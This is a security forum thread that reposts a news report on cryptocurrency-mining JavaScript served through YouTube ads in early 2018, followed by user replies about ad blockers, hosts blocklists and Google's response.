Now even YouTube serves ads with CPU-draining cryptocurrency miners

Flengo

Level 2
Thread author
Verified
Oct 19, 2017
52
Ad campaign lets attackers profit while unwitting users watch videos.
youtube-cryptocurrency-mining-800x425.jpg

YouTube was recently caught displaying ads that covertly leach off visitors' CPUs and electricity to generate digital currency on behalf of anonymous attackers, it was widely reported.

Word of the abusive ads started no later than Tuesday, as people took to social media sites to complain their antivirus programs were detecting cryptocurrency mining code when they visited YouTube. The warnings came even when people changed the browser they were using, and the warnings seemed to be limited to times when users were on YouTube.

Great now my browser everytime I watch youtube... my anti virus always blocking coinhive because malware . Idk much about it but this is getting annoying and I need a solution please T n T

— Arung (@ArungLaksmana) January 23, 2018

Hey @avast_antivirus seems that you are blocking crypto miners (#coinhive) in @YouTube #ads
Thank you :)Crypto Miner (Coinhive) in YouTube Ads | Diego Betto

— Diego Betto (@diegobetto) January 25, 2018

Por lo visto @YouTube es muy gracioso y no le bastaba con bajarnos la audiencia, ahora van y nos meten el JavaScript de Coinhive para utilizar nuestros dispositivos para minar Monero! De verdad, @Google! Que leeches estáis haciendo con YouTube?? pic.twitter.com/NzMUMlArJs

— ᛗᛟErvoᛟᛗ (@Mystic_Ervo) January 24, 2018

On Friday, researchers with antivirus provider Trend Micro said the ads helped drive a more than three-fold spike in Web miner detections. They said the attackers behind the ads were abusing Google's DoubleClick ad platform to display them to YouTube visitors in select countries, including Japan, France, Taiwan, Italy, and Spain.

The ads contain JavaScript that mines the digital coin known as Monero. In nine out of 10 cases, the ads will use publicly available JavaScript provided by Coinhive, a cryptocurrency-mining service that's controversial because it allows subscribers to profit by surreptitiously using other people's computers. The remaining 10 percent of the time, the YouTube ads use private mining JavaScript that saves the attackers the 30 percent cut Coinhive takes. Both scripts are programmed to consume 80 percent of a visitor's CPU, leaving just barely enough resources for it to function.

"YouTube was likely targeted because users are typically on the site for an extended period of time," independent security researcher Troy Mursch told Ars. "This is a prime target for cryptojacking malware, because the longer the users are mining for cryptocurrency the more money is made." Mursch said a campaign from September that used the Showtime website to deliver cryptocurrency-mining ads is another example of attackers targeting a video site.

To add insult to injury, the malicious JavaScript in at least some cases was accompanied by graphics that displayed ads for fake AV programs, which scam people out of money and often install malware when they are run.

ad.jpg

The above ad was posted on Tuesday. Like the ads analyzed by Trend Micro and posted on social media, it mined Monero coins on behalf of someone with the Coinhive site key of "h7axC8ytzLJhIxxvIHMeC0Iw0SPoDwCK." It's not possible to know how many coins the user has generated so far. Trend Micro said the campaign started January 18. In an e-mail sent as this post was going live, a Google representative wrote:

Mining cryptocurrency through ads is a relatively new form of abuse that violates our policies and one that we’ve been monitoring actively. We enforce our policies through a multi-layered detection system across our platforms which we update as new threats emerge. In this case, the ads were blocked in less than two hours and the malicious actors were quickly removed from our platforms.

It wasn't clear what the representative meant when saying the ads were blocked in less than two hours. Evidence supplied by Trend Micro and on social media showed various ads containing substantially the same JavaScript ran for as long as a week. The representative didn't respond to follow-up questions seeking a timeline of when the abusive ads started and ended.

As the problem of Web-based cryptomining has surged to almost epidemic proportions, a variety of AV programs have started warning of cryptocurrency-mining scripts hosted on websites and giving users the option of blocking the activity. While drive-by cryptocurrency mining is an abuse that drains visitors' electricity and computing resources, there's no indication that it installs ransomware or other types of malware, as long as people don't click on malicious downloads.
 
F

ForgottenSeer 58943

Fortinet appliances now block cryptominers. Also my Pi-Hole has cryptominer signatures now. Very handy! Also, people with Fire Sticks, my Fortinet has blocked repeated attempts to server miner laden updates to the firestick!

BTW for those with Pi-Hole, or needing hosts, here's a list of all known coinminers, it's updated daily.

https://raw.githubusercontent.com/ZeroDot1/CoinBlockerLists/master/hosts
 
D

Deleted member 65228

No wonder Youtube plays like ##### then if all resources are wasted on crypto ##### instead of decoding of the god damn video...
It doesn't apply to everyone - only if the attacker's advertising content is loaded on the web-page, in which their JS is activated. It's not a situation of every video you run or every web-page on YouTube, there is a crypto-currency miner active.

Bear in mind that this isn't Google's doing and they are likely working on resolving the issue. Add a good ad-blocker to your configuration in the mean-time and you'll be good as golden.
 

RejZoR

Level 15
Verified
Top Poster
Well-known
Nov 26, 2016
699
It doesn't apply to everyone - only if the attacker's advertising content is loaded on the web-page, in which their JS is activated. It's not a situation of every video you run or every web-page on YouTube, there is a crypto-currency miner active.

Bear in mind that this isn't Google's doing and they are likely working on resolving the issue. Add a good ad-blocker to your configuration in the mean-time and you'll be good as golden.

Well, I'm using Opera which has a miner blocker by default now, but still. This thing is literally the same than a decade old cases of malware injection to clean and trusted site via ads on it...
 

Prorootect

Level 69
Verified
Nov 5, 2011
5,855
But a source with direct knowledge of YouTube's handling.jpg
But a source with direct knowledge of YouTube's handling.jpg large.jpeg


But a source with direct knowledge of YouTube’s handling of the situation told Gizmodo that the two-hour measurement was just being applied to each individual ad run by the hackers, not the ads en masse. YouTube approves a clean ad submitted by a clean account set up by the hijacker. When the ad goes live, the attackers use various cloaking methods to subvert YouTube’s system and swap the ad with one that includes the malicious script. A couple hours later, the ad is detected, taken down, and the user who submitted it gets their account deleted. Wash. Rinse. Repeat. To sum this up in the most generous terms, YouTube and Google’s ad network, in general, has an ongoing and ever-evolving problem on its hands.

The thing about all of this is that cryptojacking isn’t that big of a deal. Flagged instances are becoming more frequent, but the harm to your privacy or system is virtually non-existent. What sucks is that someone out there (in this case the owner of a single CoinHive site key) is using your CPU power and electricity to make money and you don’t get a cut. You’re unwittingly funding cybercrime while YouTube makes its money from serving you ads. And from a big picture perspective, security flaws are being exposed. Just because the script wasn’t particularly dangerous this time around, doesn’t mean it couldn’t be some nasty ransomware next time.

Source: gizmodo.com:
Hackers Hijacking CPUs to Mine Cryptocurrency Have Now Invaded YouTube Ads
https://gizmodo.com/hackers-hijacki..._source=gizmodo_twitter&utm_medium=socialflow

- So listen carefully to your fan!
 
Last edited:

kev216

Level 21
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Aug 6, 2014
1,044
They really force us to use an adblocker these days. Long live adguard!
 
  • Like
Reactions: Devilish

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top